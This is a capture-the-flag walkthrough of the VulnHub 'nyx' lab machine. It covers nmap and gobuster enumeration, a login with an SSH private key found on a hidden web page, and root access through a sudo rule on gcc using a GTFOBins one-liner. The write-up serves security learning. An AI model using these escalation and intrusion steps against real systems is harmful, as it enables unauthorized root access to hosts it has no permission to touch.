Enumeration and Initial Shell
As usual, I started with nmap to look for open ports and default services.
┌──(madhav㉿kali)-[~/Documents/vulnhub/nyx] └─$ nmap -sC -sV -oN nmap/initial 192.168.1.3 Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-23 13:08 IST Nmap scan report for 192.168.1.3 Host is up (0.0021s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 fc:8b:87:f4:36:cd:7d:0f:d8:f3:16:15:a9:47:f1:0b (RSA) | 256 b4:5c:08:96:02:c6:a8:0b:01:fd:49:68:dd:aa:fb:3a (ECDSA) |_ 256 cb:bf:22:93:69:76:60:a4:7d:c0:19:f3:c7:15:e7:3c (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: nyx Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.18 seconds
We can see port 80 and 22 open. Let's open our browser and check port 80 first.
Next, I performed a gobuster scan to look for hidden files and directories.
┌──(madhav㉿kali)-[~/Documents/vulnhub/nyx] └─$ gobuster dir -u http://192.168.1.3 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.html =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.1.3 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: txt,php,html [+] Timeout: 10s =============================================================== 2020/09/23 13:09:00 Starting gobuster =============================================================== /index.html (Status: 200) /key.php (Status: 200) /server-status (Status: 403) =============================================================== 2020/09/23 13:12:53 Finished ===============================================================
We can see a page named key.php, After opening it in our browser, I saw that it asks us for a key.
Looking at the source code of the page, I found that this form is not submitting the value anywhere, So basically it was a rabbit hole. Next, I ran the http-enum script in Nmap.
┌──(madhav㉿kali)-[~/Documents/vulnhub/nyx] └─$ nmap -sC -sV -p 80 --script=http-enum 192.168.1.3 Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-23 13:13 IST Nmap scan report for 192.168.1.3 Host is up (0.00032s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.38 ((Debian)) | http-enum: |_ /d41d8cd98f00b204e9800998ecf8427e.php: Seagate BlackArmorNAS 110/220/440 Administrator Password Reset Vulnerability |_http-server-header: Apache/2.4.38 (Debian) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.16 seconds
Here it reveals another page, I opened this in the browser and found a SSH key.
Looking at the title of this page, we can find a username
mpampis. I copied this key and saved it into a file and logged in via ssh after giving the correct permissions. After logging in, we can read our user flag.
nano id_rsa chmod 600 id_rsa ssh -i id_rsa email@example.com
For obtaining the root shell, I used the
sudo -l command to see if this user can run any commands as root.
mpampis@nyx:/$ sudo -l Matching Defaults entries for mpampis on nyx: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User mpampis may run the following commands on nyx: (root) NOPASSWD: /usr/bin/gcc
We can run gcc as root. I searched for this in GTFO Bins and found that we can get a root shell using this simple command:
sudo gcc -wrapper /bin/sh,-s .
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Evgeny Polukhin.